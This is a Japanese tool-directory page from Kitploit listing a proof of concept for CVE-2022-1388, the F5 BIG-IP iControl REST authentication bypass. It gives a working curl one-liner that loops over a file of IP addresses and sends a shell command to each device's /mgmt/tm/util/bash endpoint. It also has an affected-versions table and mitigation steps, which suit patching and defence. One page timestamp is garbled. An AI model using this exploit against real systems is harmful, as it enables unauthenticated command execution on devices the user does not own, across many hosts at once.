Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-1388 — BIG-IP iControl RESTの脆弱性 CVE-2022-1388 PoC | Kitploit
ツール/GitHubGitHub/shamo0/cve-2022-1388
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubshamo0/cve-2022-1388

CVE-2022-1388

BIG-IP iControl RESTの脆弱性 CVE-2022-1388 PoC

リポジトリを見る
1474年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

BIG-IP iControl REST 脆弱性 CVE-2022-1388 PoC

f5logo

この脆弱性により、管理ポートやセルフIPアドレスを介してBIG-IPシステムにネットワークアクセスできる認証されていない攻撃者が、任意のシステムコマンドの実行、ファイルの作成・削除、またはサービスの無効化を行う可能性があります。

PoC

以下のcurlワンライナーを使用してF5 Big-IPの脆弱性を確認するか、提供されているPythonスクリプトを使用することができます。

root@kitploit:~
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

脆弱性のあるバージョン(Big-IP)

ツールをダウンロード
ブランチ脆弱性のあるバージョン修正が導入されたバージョン
11.x11.6.1-11.6.5修正なし
12.x12.1.0-12.1.6修正なし
13.x13.1.0-13.1.413.1.5
14.x14.1.0-14.1.414.1.4.6
15.x15.1.0-15.1.515.1.5.1
16.x16.1.0-16.1.216.1.2.2
17.xなし17.0.0

緩和策

  • ```修正が導入されたバージョン``` の列に記載された修正版にアップグレードする。(推奨方法)
  • セルフIPアドレスを介したiControl RESTアクセスをブロックする
  • 管理インターフェースを介したiControl RESTアクセスをブロックする
  • BIG-IP httpd設定を変更する

緩和策の詳細については、参考文献を参照してください。

参考文献

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit